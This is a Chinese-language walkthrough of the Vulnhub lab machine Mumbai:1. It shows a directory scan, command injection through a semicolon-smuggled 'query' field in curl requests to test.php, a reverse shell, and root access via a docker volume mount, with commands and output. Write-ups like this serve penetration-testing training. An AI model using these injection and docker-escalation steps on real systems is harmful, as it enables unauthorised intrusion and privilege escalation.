zoukankan      html  css  js  c++  java
  • Mumbai:1 Vulnhub Walkthrough

    靶机地址:

    https://www.vulnhub.com/entry/mumbai-1,372/

    主机探测:

    主机端口扫描:

    FTP 下载Note文件

    TODO:

    Move these multiple HTTP Servers running to Docker. I hear containers make things inherently
    secure - maybe this will shut those security researchers up.

    Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want to
    rebuild the server again.

    - AbsoZed

    意思就是可以使用docker来进行提权,因为HTTP使用的是docker容器跑的

    HTTP目录扫描

    http://10.10.203.18/drupal/

    列目录为空

    http://10.10.203.18/wordpress/ 无法访问

    在枚举HTTP 8000端口

    dirb http://10.10.203.18:8000 -X .php,.txt,.json,.xml,.py,.yml

    + http://10.10.203.18:8000/keywords.py (CODE:200|SIZE:1376)
    + http://10.10.203.18:8000/test.php (CODE:200|SIZE:64)

    下载两个文件查看内容

    test.php文件内容

    Please POST a proper query. ex: https://caffeinatedengineers.com

    keywords.py py脚本就是发送请求给URL

    尝试请求下几个有用的URL

    |--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/" http://10.10.203.18:8000/test.php
    Site Keywords and Counts:
    [('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]

    root at Hack404 in ~
    |--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/;id" http://10.10.203.18:8000/test.php
    Site Keywords and Counts:
    [('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
    uid=1001(apiuser) gid=1001(apiuser) groups=1001(apiuser),115(docker)

    本地监听1234

    执行:curl -d "query=http://10.10.203.18/wordpress/;php shell.php" http://10.10.203.18:8000/test.php

    获取shell,尝试提权操作

    docker run -v /root:/mnt -it alpine

    # cd /root/
    cd /root/
    ~ # cd /mnt
    cd /mnt
    /mnt # ls
    ls
    proof.txt
    /mnt # cat proof.txt

    OVER !!

  • 相关阅读:
    Chrome Native Messaging 与本地程序之间的通信
    由于扩展配置问题而无法提供您请求的页面。如果该页面是脚本,请添加处理程序。如果应下载文件,请添加 MIME 映射。
    linux
    maven POM.xml 标签详解 转
    java-线程观察整个生命周期
    java-Web项目开发中Spring整合Junit单元测试
    java-Map集合的四种遍历方式
    Java-8内置的核心函数式接口接口
    正则表达式
    Java-Atomic系列12大类实例讲解和原理分解
  • 原文地址:https://www.cnblogs.com/hack404/p/12124777.html
Copyright © 2011-2022 走看看